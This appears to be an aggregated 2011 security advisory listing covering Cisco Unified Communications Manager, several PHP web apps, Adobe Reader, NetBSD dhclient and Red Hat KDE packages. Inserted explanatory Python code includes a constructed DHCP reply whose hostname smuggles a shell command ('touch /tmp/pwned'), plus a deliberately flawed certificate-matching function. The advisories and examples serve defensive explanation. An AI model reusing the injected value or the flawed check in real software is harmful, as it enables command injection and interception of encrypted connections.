The first SIP DoS vulnerability is documented in Cisco Bug ID CSCti42904 and has been assigned Common Vulnerabilities and Exposures (CVE) identifier CVE-2011-1604. This vulnerability is fixed in Cisco Unified Communications Manager versions 8.5(1), 8.0(3a)su2, 7.1(5b)su3, and 6.1(5)su3.
The second SIP DoS vulnerability is documented in Cisco Bug ID CSCth39586 and has been assigned CVE identifier CVE-2011-1605. This vulnerability is fixed in Cisco Unified Communications Manager versions 8.5(1), 8.0(3), 7.1(5b)su2, and 6.1(5)su2.
The third SIP DoS vulnerability is documented in Cisco Bug ID CSCtg62855 and has been assigned CVE identifier CVE-2011-1606. This vulnerability is fixed in Cisco Unified Communications Manager versions 8.5(1), 8.0(3), 7.1(5)su1, and 6.1(5)su2.
Directory Traversal Vulnerability
Cisco Unified Communications Manager contains a vulnerability in the processing of POST requests. An authenticated, remote attacker who can intercept a request to the affected device could specify a different location or filename, which may result in the upload of a malicious file. This vulnerability is documented in Cisco Bug ID CSCti81603 and has been assigned CVE identifier CVE-2011-1607. It is fixed in Cisco Unified Communications Manager versions 8.5(1), 8.0(3a)su1, 7.1(5b)su3, and 6.1(5)su3.
SQL Injection Vulnerabilities
Cisco Unified Communications Manager is affected by the following SQL injection vulnerabilities:
- The first vulnerability could allow an authenticated, remote attacker to modify the system configuration; create, modify and delete users; or modify the configuration of Cisco Unified Communications Manager. This vulnerability is documented in Cisco Bug ID CSCtg85647 and has been assigned CVE identifier CVE-2011-1609. This vulnerability is fixed in Cisco Unified Communications Manager versions 8.5(1), 8.0(3), 7.1(5)su1, and 6.1(5)su2.
- The second vulnerability could allow an unauthenticated, remote attacker to modify system configuration; create, modify, and delete users; or modify the configuration of Cisco Unified Communications Manager. This vulnerability is documented in Cisco Bug ID CSCtj42064 (registered customers only) and has been assigned CVE identifier CVE-2011-1610. This vulnerability is fixed in Cisco Unified Communications Manager versions 8.5(1)su1, 8.0(3a)su2, 7.1(5)su4, and 6.1(5)su3.
Successful exploitation of the vulnerabilities that are described in this advisory could result in the interruption of voice services, privilege escalation and possible data modification. In the case of DoS attacks, the affected Cisco Unified Communications Manager processes will restart, but repeated attacks may result in a sustained DoS condition.
Vulnerable Products
The following products are affected by at least one of the vulnerabilities that are described in this advisory:
- Cisco Unified Communications Manager 6.x
- Cisco Unified Communications Manager 7.x
- Cisco Unified Communications Manager 8.x
Note: Cisco Unified Communications Manager version 5.1 reached end of software maintenance on February 13, 2010. Customers who are using Cisco Unified Communications Manager 5.x versions should contact their Cisco support team for assistance in upgrading to a supported version of Cisco Unified Communications Manager.
Products Confirmed Not Vulnerable
Cisco Unified Communications Manager version 4.x is not affected by these vulnerabilities. No other Cisco products are currently known to be affected by these vulnerabilities.
-
Solution:
Obtaining Fixed Software
Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html, or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml.
Workarounds
A workaround exists only for the SIP DoS vulnerabilities. Cisco Unified Communications Manager versions 6.1(4), 7.1(2), and 8.0(1) introduced the ability to disable SIP processing. SIP processing is enabled by default. Customers who do not use SIP processing can use the following instructions to disable SIP processing:
- Step 1: Log into the Cisco Unified Communications Manager Administration web interface.
- Step 2: Navigate to System > Service Parameters and select the appropriate Cisco Unified Communications Manager server and the Cisco CallManager Service.
- Step 3: Change the "SIP Interoperability Enabled" parameter to False, and click Save.
Note: For a SIP processing change to take effect, the Cisco CallManager Service must be restarted. For information on how to restart the service, refer to the "Restarting the Cisco CallManager Service" section of the document at the following location: http://www.cisco.com/en/US/docs/voice_ip_comm/cucm/admin/7_1_2/ccmcfg/b03dpi.html#wp1075124
It is possible to mitigate these vulnerabilities by implementing filtering on screening devices and permitting access to TCP ports 5060 and 5061 and UDP ports 5060 and 5061 only from networks that require SIP access to Cisco Unified Communications Manager servers.
Additional mitigations that can be deployed on Cisco devices in the network are available in the companion document "Cisco Applied Mitigation Bulletin: Identifying and Mitigating Exploitation of the Multiple Vulnerabilities in Cisco Unified Communications Manager" which is available at the following location:
http://www.cisco.com/warp/public/707/cisco-amb-20110427-cucm.shtml
Software Versions and Fixes
When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance.
Cisco recommends upgrading to a release equal to or later than the release in the "Recommended Releases" column of the table.
Cisco Unified Communications Manager Version    Recommended Releases
6.x                                             6.1(5)SU3
7.x                                             7.1(5b)SU4
8.0                                             8.0(3a)SU2
8.5                                             8.5(1)SU1
Note: The 7.1(5b)SU4 release of Cisco Unified Communications Manager is expected to be available by the end of April 2011.
- Additional links:
- Name of Program: Path disclosure in BuddyPress WordPress plugin
- Developer website:
- Thread: Low
- POC: Download ↓
-
Overview:
A remote user can determine the full path to the web root directory and other potentially sensitive information.
-
Solution:
Not available.
- Additional links:
- Name of Program: SQL Injection in phpMySport
- Developer website:
- Thread: High
- POC: Download ↓
-
Overview:
The vulnerability exists due to a failure of the "/index.php" script to properly sanitize user-supplied input in the "v1" variable. An attacker can alter queries to the application's SQL database, execute arbitrary queries against the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.
-
Solution:
Not available.
- Additional links:
- Name of Program: XSS in Max's PHP Photo Album
- Developer website:
- Thread: Medium
- POC: Download ↓
-
Overview:
A user can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to a failure of the "showimage.php" script to properly sanitize user-supplied input in the "id" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, or disclosure or modification of sensitive data.
-
Solution:
Not available.
- Additional links:
- Name of Program: XSS vulnerabilities in Noah's Classifieds
- Developer website:
- Thread: Medium
- POC: Download ↓
-
Overview:
A user can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to a failure of the "index.php" script to properly sanitize user-supplied input in the "col_18" and "description" variables. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, or disclosure or modification of sensitive data.
-
Solution:
Not available.
- Additional links:
- Name of Program: XSS vulnerabilities in phpList
- Developer website:
- Thread: Medium
- POC: Download ↓
-
Overview:
A user can execute arbitrary JavaScript code within the vulnerable application. The vulnerabilities exist due to a failure of the "admin/commonlib/lib/userlib.php", "admin/template.php" and "admin/editlist.php" scripts to properly sanitize user-supplied input in the "email" variable. Successful exploitation of these vulnerabilities could result in a compromise of the application, theft of cookie-based authentication credentials, or disclosure or modification of sensitive data.
-
Solution:
Not available.
- Additional links:
- Name of Program: XSS in WP-Ajax-Recent-Posts wordpress plugin
- Developer website:
- Thread: Medium
- POC: Download ↓
-
Overview:
A user can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to a failure of the "function.php" script to properly sanitize user-supplied input in the "number" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, or disclosure or modification of sensitive data.
-
Solution:
Not available.
- Additional links:
- Name of Program: Path disclosure in yappa-ng Photo Gallery
- Developer website:
- Thread: Low
- POC: Download ↓
-
Overview:
The vulnerability exists in the "languages/language_selection.inc.php" script: it is possible to trigger an error that reveals the full path of the script. A remote user can thereby determine the full path to the web root directory and other potentially sensitive information.
-
Solution:
Not available.
- Additional links:
- Name of Program: XSRF (CSRF) in phpList
- Developer website:
- Thread: Low
- POC: Download ↓
-
Overview:
The vulnerability exists due to a failure of the "admin/configure.php" script to properly verify the source of HTTP requests. Successful exploitation of this vulnerability could allow an attacker to make configuration changes with the privileges of a logged-in administrator, resulting in a compromise of the application or modification of sensitive data.
An attacker can exploit this vulnerability using a web browser.
-
Solution:
Not available.
- Additional links:
- Name of Program: Adobe Reader and Acrobat: Execute arbitrary code/commands - Remote with user interaction
- Developer website:
- Thread: High
-
Overview:
Critical vulnerabilities have been identified in Adobe Reader and Acrobat X (10.0.2) and earlier 10.x and 9.x versions for Windows and Macintosh operating systems. These vulnerabilities, including CVE-2011-0611, as referenced in Security Advisory APSA11-02, could cause a crash and potentially allow an attacker to take control of the affected system. There are reports that one of the vulnerabilities, CVE-2011-0611, is being actively exploited in the wild against both Adobe Flash Player, and Adobe Reader and Acrobat, as well as via a Flash (.swf) file embedded in a Microsoft Word (.doc) or Microsoft Excel (.xls) file delivered as an email attachment targeting the Windows platform. Adobe Reader X Protected Mode mitigations would prevent an exploit of this kind from executing.
Adobe recommends users of Adobe Reader X (10.0.2) for Macintosh update to Adobe Reader X (10.0.3). For users of Adobe Reader 9.4.3 for Windows and Macintosh, Adobe has made available the update Adobe Reader 9.4.4. Adobe recommends users of Adobe Acrobat X (10.0.2) for Windows and Macintosh update to Adobe Acrobat X (10.0.3). Adobe recommends users of Adobe Acrobat 9.4.3 for Windows and Macintosh update to Adobe Acrobat 9.4.4. Because Adobe Reader X Protected Mode would prevent exploits of the type targeting CVE-2011-0611 from executing, Adobe is currently planning to address these issues in Adobe Reader X for Windows with the next quarterly security update for Adobe Reader, currently scheduled for June 14, 2011. Today's security updates are out-of-cycle updates.
Affected software versions
- Adobe Reader X (10.0.1) and earlier versions for Windows
- Adobe Reader X (10.0.2) and earlier versions for Macintosh
- Adobe Acrobat X (10.0.2) and earlier versions for Windows and Macintosh
Note: Adobe Reader 9.x for UNIX, Adobe Reader for Android, and Adobe Reader and Acrobat 8.x are not affected by CVE-2011-0611.
-
Solution:
Adobe recommends users update their software installations by following the instructions below:
Adobe Reader
Users on Windows and Macintosh can utilize the product's update mechanism. The default configuration is set to run automatic update checks on a regular schedule. Update checks can be manually activated by choosing Help > Check for Updates.
Adobe Reader 9.x users on Windows can also find the appropriate update here:
http://www.adobe.com/support/downloads/product.jsp?product=10&platform=Windows
Adobe Reader 10.x and 9.x users on Macintosh can also find the appropriate update here:
http://www.adobe.com/support/downloads/product.jsp?product=10&platform=Macintosh
Because Adobe Reader X (10.x) Protected Mode would prevent an exploit of this kind from executing, Adobe is planning to address this issue in Adobe Reader X for Windows with the next quarterly security update for Adobe Reader, currently scheduled for June 14, 2011.
Adobe Acrobat
Users can utilize the product's update mechanism. The default configuration is set to run automatic update checks on a regular schedule. Update checks can be manually activated by choosing Help > Check for Updates.
Acrobat Standard and Pro 10.x and 9.x users on Windows can also find the appropriate update here:
http://www.adobe.com/support/downloads/product.jsp?product=1&platform=Windows
Acrobat Pro Extended 9.x users on Windows can also find the appropriate update here:
http://www.adobe.com/support/downloads/product.jsp?product=158&platform=Windows
Acrobat Pro users on Macintosh can also find the appropriate update here:
http://www.adobe.com/support/downloads/product.jsp?product=1&platform=Macintosh
Adobe categorizes these as critical updates and recommends affected users update their installations to the newest versions.
- Additional links:
- Name of Program: [NetBSD] dhclient: Execute arbitrary code/commands - Remote/unauthenticated
- Developer website:
- Thread: High
-
Overview:
ISC dhclient did not strip or escape certain shell meta-characters in responses from the dhcp server (like hostname) before passing the responses on to dhclient-script. This may result in execution of exploit code on the client.
For more details, please see CVE-2011-0997.
-
Solution:
dhclient(8) exports many variables to the environment, some of which are strings provided by the DHCP server and were not sanity-checked for shell metacharacters. In the current implementation of /sbin/dhclient-script, "eval" is only used in ifconfig(8) commands whose arguments from the environment cannot be set to arbitrary strings by the DHCP server ($interface and $medium are set by the client; $new_ip_address, $new_netmask_arg, $new_broadcast_arg, $alias_ip_address and $old_ip_address are IP addresses). Nevertheless, one should either patch dhclient to sanitize all variables or add the following line to /sbin/dhclient-script at the beginning of the set_hostname() function:
new_host_name="$(echo "${new_host_name}" | sed -e 's/[^a-zA-Z0-9-]*//g')"
The reason to do this is that unless the hostname is sanitized, a hostname containing shell metacharacters can be set on the system, and other scripts that use the compromised hostname might break.
In environments where filters/acls can be put into place to limit clients to accessing only legitimate dhcp servers, this will protect clients from rogue dhcp servers deliberately trying to exploit this bug. However, this will not protect from compromised servers.
Further workarounds: disable dhclient(8) from the base OS and use the fixed isc-dhclient4 package from pkgsrc.
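An added example, not NetBSD code, that shows where the attacker-controlled string enters and what the workaround above leaves of it: it pulls the server-supplied host name (option 12) out of a raw DHCP reply and applies the same allow-list as the sed line in dhclient-script. The reply is constructed here (zeroed 236-byte fixed header, magic cookie, then options); the raw value is what would have reached dhclient-script as $new_host_name.

```python
"""Added example, not NetBSD code: parse the options area of a DHCP reply and
sanitize the Host Name option the way the dhclient-script workaround does."""
import re

DHCP_MAGIC = b"\x63\x82\x53\x63"   # options cookie after the 236-byte fixed header
OPT_PAD, OPT_HOST_NAME, OPT_DOMAIN_NAME, OPT_END = 0, 12, 15, 255


def parse_options(packet):
    """Return {option_code: bytes} for the options area of a raw DHCP message."""
    if len(packet) < 240 or packet[236:240] != DHCP_MAGIC:
        raise ValueError("not a DHCP message: bad length or magic cookie")
    options, i = {}, 240
    while i < len(packet):
        code = packet[i]
        if code == OPT_END:
            break
        if code == OPT_PAD:
            i += 1
            continue
        if i + 1 >= len(packet):
            raise ValueError("truncated option header")
        length = packet[i + 1]
        data = packet[i + 2:i + 2 + length]
        if len(data) != length:
            raise ValueError("truncated option payload")
        options[code] = options.get(code, b"") + data   # repeated codes concatenate (RFC 3396)
        i += 2 + length
    return options


def sanitize_hostname(value):
    """Equivalent of the workaround's sed 's/[^a-zA-Z0-9-]*//g': keep letters, digits, '-'."""
    return re.sub(r"[^a-zA-Z0-9-]", "", value)


def extract_hostname(packet):
    """Return (raw, sanitized) host name from a DHCP reply; raw is attacker-controlled."""
    raw = parse_options(packet).get(OPT_HOST_NAME, b"").decode("latin-1")
    return raw, sanitize_hostname(raw)


def build_reply(options):
    """Constructed test data: zeroed fixed header, cookie, TLV options, end marker."""
    body = b"".join(bytes([code, len(data)]) + data for code, data in options)
    return b"\x00" * 236 + DHCP_MAGIC + body + bytes([OPT_END])


# Constructed rogue-server reply whose host name carries shell metacharacters.
ROGUE_REPLY = build_reply([
    (OPT_HOST_NAME, b"host;touch /tmp/pwned;"),
    (OPT_DOMAIN_NAME, b"example.com"),
])

if __name__ == "__main__":
    raw, clean = extract_hostname(ROGUE_REPLY)
    print(repr(raw), "->", repr(clean))
```

Note that the allow-list also drops "." so a dotted name such as node-01.example.com collapses to node-01examplecom; decide whether your hosts rely on dotted host names before deploying the sed line unchanged. The sanitizer covers only $new_host_name; the page's own remark that other server-supplied variables are unchecked still applies.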
The following instructions describe how to upgrade your dhclient binaries by updating your source tree and rebuilding and installing a new version of dhclient.
- HEAD - src/dist/dhcp/client/dhclient.c - 1.21
- netbsd-5-0 - src/dist/dhcp/client/dhclient.c - 1.19.12.2
- netbsd-5-1 - src/dist/dhcp/client/dhclient.c - 1.19.8.1.2.1
- netbsd-5 - src/dist/dhcp/client/dhclient.c - 1.19.8.2
- netbsd-4-0 - src/dist/dhcp/client/dhclient.c - 1.18.12.2
- netbsd-4 - src/dist/dhcp/client/dhclient.c - 1.18.2.2
The following instructions briefly summarize how to update and recompile dhclient. In these instructions, replace:
VERSION - with the fixed version from the appropriate CVS branch (from the above table)
FILE - with the name of the file from the above table
To update from CVS, re-build, and re-install dhclient:
# cd src
# cvs update -d -P -r VERSION FILE
# cd usr.sbin/dhcp
# make USETOOLS=no cleandir dependall
# cd client
# make USETOOLS=no install
- Additional links:
- Name of Program: kdenetwork: Execute arbitrary code/commands - Remote with user interaction
- Developer website:
- Thread: Low
-
Overview:
Updated kdenetwork packages that fix one security issue are now available for Red Hat Enterprise Linux 6. The Red Hat Security Response Team has rated this update as having important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.
The kdenetwork packages contain networking applications for the K Desktop Environment (KDE).
A directory traversal flaw was found in the way KGet, a download manager, handled the "file" element in Metalink files. An attacker could use this flaw to create a specially-crafted Metalink file that, when opened, would cause KGet to overwrite arbitrary files accessible to the user running KGet. (CVE-2011-1586)
Users of kdenetwork should upgrade to these updated packages, which contain a backported patch to resolve this issue. The desktop must be restarted (log out, then log back in) for this update to take effect.
-
Solution:
Before applying this update, make sure all previously-released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/kb/docs/DOC-11259
Bugs fixed (http://bugzilla.redhat.com/):
- 697042 - CVE-2011-1586 kdenetwork: incomplete fix for CVE-2010-1000
Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/kdenetwork-4.3.4-11.el6_0.1.src.rpm
i386:
- kdenetwork-4.3.4-11.el6_0.1.i686.rpm
- kdenetwork-debuginfo-4.3.4-11.el6_0.1.i686.rpm
- kdenetwork-libs-4.3.4-11.el6_0.1.i686.rpm
x86_64:
- kdenetwork-4.3.4-11.el6_0.1.x86_64.rpm
- kdenetwork-debuginfo-4.3.4-11.el6_0.1.x86_64.rpm
- kdenetwork-libs-4.3.4-11.el6_0.1.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/kdenetwork-4.3.4-11.el6_0.1.src.rpm
i386:
- kdenetwork-debuginfo-4.3.4-11.el6_0.1.i686.rpm
- kdenetwork-devel-4.3.4-11.el6_0.1.i686.rpm
x86_64:
- kdenetwork-debuginfo-4.3.4-11.el6_0.1.i686.rpm
- kdenetwork-debuginfo-4.3.4-11.el6_0.1.x86_64.rpm
- kdenetwork-devel-4.3.4-11.el6_0.1.i686.rpm
- kdenetwork-devel-4.3.4-11.el6_0.1.x86_64.rpm
- kdenetwork-libs-4.3.4-11.el6_0.1.i686.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/kdenetwork-4.3.4-11.el6_0.1.src.rpm
i386:
- kdenetwork-4.3.4-11.el6_0.1.i686.rpm
- kdenetwork-debuginfo-4.3.4-11.el6_0.1.i686.rpm
- kdenetwork-devel-4.3.4-11.el6_0.1.i686.rpm
- kdenetwork-libs-4.3.4-11.el6_0.1.i686.rpm
ppc64:
- kdenetwork-4.3.4-11.el6_0.1.ppc64.rpm
- kdenetwork-debuginfo-4.3.4-11.el6_0.1.ppc.rpm
- kdenetwork-debuginfo-4.3.4-11.el6_0.1.ppc64.rpm
- kdenetwork-devel-4.3.4-11.el6_0.1.ppc.rpm
- kdenetwork-devel-4.3.4-11.el6_0.1.ppc64.rpm
- kdenetwork-libs-4.3.4-11.el6_0.1.ppc.rpm
- kdenetwork-libs-4.3.4-11.el6_0.1.ppc64.rpm
s390x:
- kdenetwork-4.3.4-11.el6_0.1.s390x.rpm
- kdenetwork-debuginfo-4.3.4-11.el6_0.1.s390.rpm
- kdenetwork-debuginfo-4.3.4-11.el6_0.1.s390x.rpm
- kdenetwork-devel-4.3.4-11.el6_0.1.s390.rpm
- kdenetwork-devel-4.3.4-11.el6_0.1.s390x.rpm
- kdenetwork-libs-4.3.4-11.el6_0.1.s390.rpm
- kdenetwork-libs-4.3.4-11.el6_0.1.s390x.rpm
x86_64:
- kdenetwork-4.3.4-11.el6_0.1.x86_64.rpm
- kdenetwork-debuginfo-4.3.4-11.el6_0.1.i686.rpm
- kdenetwork-debuginfo-4.3.4-11.el6_0.1.x86_64.rpm
- kdenetwork-devel-4.3.4-11.el6_0.1.i686.rpm
- kdenetwork-devel-4.3.4-11.el6_0.1.x86_64.rpm
- kdenetwork-libs-4.3.4-11.el6_0.1.i686.rpm
- kdenetwork-libs-4.3.4-11.el6_0.1.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/kdenetwork-4.3.4-11.el6_0.1.src.rpm
i386:
- kdenetwork-4.3.4-11.el6_0.1.i686.rpm
- kdenetwork-debuginfo-4.3.4-11.el6_0.1.i686.rpm
- kdenetwork-devel-4.3.4-11.el6_0.1.i686.rpm
- kdenetwork-libs-4.3.4-11.el6_0.1.i686.rpm
x86_64:
- kdenetwork-4.3.4-11.el6_0.1.x86_64.rpm
- kdenetwork-debuginfo-4.3.4-11.el6_0.1.i686.rpm
- kdenetwork-debuginfo-4.3.4-11.el6_0.1.x86_64.rpm
- kdenetwork-devel-4.3.4-11.el6_0.1.i686.rpm
- kdenetwork-devel-4.3.4-11.el6_0.1.x86_64.rpm
- kdenetwork-libs-4.3.4-11.el6_0.1.i686.rpm
- kdenetwork-libs-4.3.4-11.el6_0.1.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package
- Additional links:
- Name of Program: kdelibs: Multiple vulnerabilities
- Developer website:
- Thread: Medium
-
Overview:
Updated kdelibs packages that fix two security issues are now available for Red Hat Enterprise Linux 6.
The Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
The kdelibs packages provide libraries for the K Desktop Environment (KDE).
A cross-site scripting (XSS) flaw was found in the way KHTML, the HTML layout engine used by KDE applications such as the Konqueror web browser, displayed certain error pages. A remote attacker could use this flaw to perform a cross-site scripting attack against victims by tricking them into visiting a specially-crafted URL. (CVE-2011-1168)
A flaw was found in the way kdelibs checked the user-specified hostname against the name in the server's SSL certificate. A man-in-the-middle attacker could use this flaw to trick an application using kdelibs into accepting a certificate as valid for the host if that certificate was issued for an IP address to which the user-specified hostname resolved. (CVE-2011-1094)
Note: As part of the fix for CVE-2011-1094, this update also introduces stricter handling for wildcards used in servers' SSL certificates.
Users should upgrade to these updated packages, which contain backported patches to correct these issues. The desktop must be restarted (log out, then log back in) for this update to take effect.
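An added example, not kdelibs code, contrasting the class of check described for CVE-2011-1094 with a strict one. match_flawed accepts a certificate issued for an IP address when the user typed a host name that merely resolved to that address; because a man-in-the-middle can steer DNS, an unrelated but valid IP-address certificate then passes. match_strict compares only the identity the user supplied, and applies conservative wildcard rules (assumed here in the spirit of RFC 6125, not necessarily the exact rules the kdelibs update introduced). The certificate's subjectAltName entries and the scenario are constructed.

```python
"""Added example, not kdelibs code: server identity matching, flawed vs strict."""
import ipaddress


def is_ip_literal(text):
    try:
        ipaddress.ip_address(text)
        return True
    except ValueError:
        return False


def dns_name_matches(pattern, name):
    """Case-insensitive DNS-ID match. A wildcard is allowed only as the whole
    left-most label, matches exactly one label, and is rejected for names as
    short as '*.com'."""
    pattern, name = pattern.lower().rstrip("."), name.lower().rstrip(".")
    if "*" not in pattern:
        return pattern == name
    p_labels, n_labels = pattern.split("."), name.split(".")
    if p_labels[0] != "*" or "*" in pattern[1:] or len(p_labels) < 3:
        return False
    return len(p_labels) == len(n_labels) and p_labels[1:] == n_labels[1:]


def match_flawed(requested_host, resolved_ip, san_entries):
    """Accepts a DNS SAN for the host name OR an IP SAN for the address it resolved to."""
    for kind, value in san_entries:
        if kind == "DNS" and dns_name_matches(value, requested_host):
            return True
        if kind == "IP" and value == resolved_ip:
            return True   # the flaw: the resolved address is not the identity the user asked for
    return False


def match_strict(requested, san_entries):
    """Compares only the reference identity the user supplied: DNS SANs for a
    host name, IP SANs only when the user connected to an IP literal."""
    if is_ip_literal(requested):
        wanted = ipaddress.ip_address(requested)
        return any(kind == "IP" and ipaddress.ip_address(value) == wanted
                   for kind, value in san_entries)
    return any(kind == "DNS" and dns_name_matches(value, requested)
               for kind, value in san_entries)


# Constructed scenario: the attacker holds a valid certificate for a different
# service (mail.example.org, a wildcard, and its IP) and points the victim's DNS
# for bank.example.com at that IP.
ATTACKER_SAN = [("DNS", "mail.example.org"), ("DNS", "*.example.org"), ("IP", "192.0.2.10")]

if __name__ == "__main__":
    print("flawed:", match_flawed("bank.example.com", "192.0.2.10", ATTACKER_SAN))  # True
    print("strict:", match_strict("bank.example.com", ATTACKER_SAN))                # False
```

The wildcard helper also illustrates what "stricter handling for wildcards" typically means in practice: *.example.org covers www.example.org but not a.b.example.org, and patterns such as *.com or f*.example.org are refused outright.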
-
Solution:
Before applying this update, make sure all previously-released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/kb/docs/DOC-11259
Bugs fixed (http://bugzilla.redhat.com/):
- 632114 - CVE-2011-1094 kdelibs: SSL certificate for IP address accepted as valid for hosts that resolve to the IP
- 695398 - CVE-2011-1168 kdelibs: partially universal XSS in Konqueror error pages
Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/kdelibs-4.3.4-11.el6_0.2.src.rpm
i386:
- kdelibs-4.3.4-11.el6_0.2.i686.rpm
- kdelibs-common-4.3.4-11.el6_0.2.i686.rpm
- kdelibs-debuginfo-4.3.4-11.el6_0.2.i686.rpm
x86_64:
- kdelibs-4.3.4-11.el6_0.2.i686.rpm
- kdelibs-4.3.4-11.el6_0.2.x86_64.rpm
- kdelibs-common-4.3.4-11.el6_0.2.x86_64.rpm
- kdelibs-debuginfo-4.3.4-11.el6_0.2.i686.rpm
- kdelibs-debuginfo-4.3.4-11.el6_0.2.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/kdelibs-4.3.4-11.el6_0.2.src.rpm
i386:
- kdelibs-debuginfo-4.3.4-11.el6_0.2.i686.rpm
- kdelibs-devel-4.3.4-11.el6_0.2.i686.rpm
noarch:
- kdelibs-apidocs-4.3.4-11.el6_0.2.noarch.rpm
x86_64:
- kdelibs-debuginfo-4.3.4-11.el6_0.2.i686.rpm
- kdelibs-debuginfo-4.3.4-11.el6_0.2.x86_64.rpm
- kdelibs-devel-4.3.4-11.el6_0.2.i686.rpm
- kdelibs-devel-4.3.4-11.el6_0.2.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/kdelibs-4.3.4-11.el6_0.2.src.rpm
noarch:
- kdelibs-apidocs-4.3.4-11.el6_0.2.noarch.rpm
x86_64:
- kdelibs-4.3.4-11.el6_0.2.i686.rpm
- kdelibs-4.3.4-11.el6_0.2.x86_64.rpm
- kdelibs-common-4.3.4-11.el6_0.2.x86_64.rpm
- kdelibs-debuginfo-4.3.4-11.el6_0.2.i686.rpm
- kdelibs-debuginfo-4.3.4-11.el6_0.2.x86_64.rpm
- kdelibs-devel-4.3.4-11.el6_0.2.i686.rpm
- kdelibs-devel-4.3.4-11.el6_0.2.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/kdelibs-4.3.4-11.el6_0.2.src.rpm
i386:
- kdelibs-4.3.4-11.el6_0.2.i686.rpm
- kdelibs-common-4.3.4-11.el6_0.2.i686.rpm
- kdelibs-debuginfo-4.3.4-11.el6_0.2.i686.rpm
- kdelibs-devel-4.3.4-11.el6_0.2.i686.rpm
noarch:
- kdelibs-apidocs-4.3.4-11.el6_0.2.noarch.rpm
ppc64:
- kdelibs-4.3.4-11.el6_0.2.ppc.rpm
- kdelibs-4.3.4-11.el6_0.2.ppc64.rpm
- kdelibs-common-4.3.4-11.el6_0.2.ppc64.rpm
- kdelibs-debuginfo-4.3.4-11.el6_0.2.ppc.rpm
- kdelibs-debuginfo-4.3.4-11.el6_0.2.ppc64.rpm
- kdelibs-devel-4.3.4-11.el6_0.2.ppc.rpm
- kdelibs-devel-4.3.4-11.el6_0.2.ppc64.rpm
s390x:
- kdelibs-4.3.4-11.el6_0.2.s390.rpm
- kdelibs-4.3.4-11.el6_0.2.s390x.rpm
- kdelibs-common-4.3.4-11.el6_0.2.s390x.rpm
- kdelibs-debuginfo-4.3.4-11.el6_0.2.s390.rpm
- kdelibs-debuginfo-4.3.4-11.el6_0.2.s390x.rpm
- kdelibs-devel-4.3.4-11.el6_0.2.s390.rpm
- kdelibs-devel-4.3.4-11.el6_0.2.s390x.rpm
x86_64:
- kdelibs-4.3.4-11.el6_0.2.i686.rpm
- kdelibs-4.3.4-11.el6_0.2.x86_64.rpm
- kdelibs-common-4.3.4-11.el6_0.2.x86_64.rpm
- kdelibs-debuginfo-4.3.4-11.el6_0.2.i686.rpm
- kdelibs-debuginfo-4.3.4-11.el6_0.2.x86_64.rpm
- kdelibs-devel-4.3.4-11.el6_0.2.i686.rpm
- kdelibs-devel-4.3.4-11.el6_0.2.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/kdelibs-4.3.4-11.el6_0.2.src.rpm
i386:
- kdelibs-4.3.4-11.el6_0.2.i686.rpm
- kdelibs-common-4.3.4-11.el6_0.2.i686.rpm
- kdelibs-debuginfo-4.3.4-11.el6_0.2.i686.rpm
- kdelibs-devel-4.3.4-11.el6_0.2.i686.rpm
noarch:
- kdelibs-apidocs-4.3.4-11.el6_0.2.noarch.rpm
x86_64:
- kdelibs-4.3.4-11.el6_0.2.i686.rpm
- kdelibs-4.3.4-11.el6_0.2.x86_64.rpm
- kdelibs-common-4.3.4-11.el6_0.2.x86_64.rpm
- kdelibs-debuginfo-4.3.4-11.el6_0.2.i686.rpm
- kdelibs-debuginfo-4.3.4-11.el6_0.2.x86_64.rpm
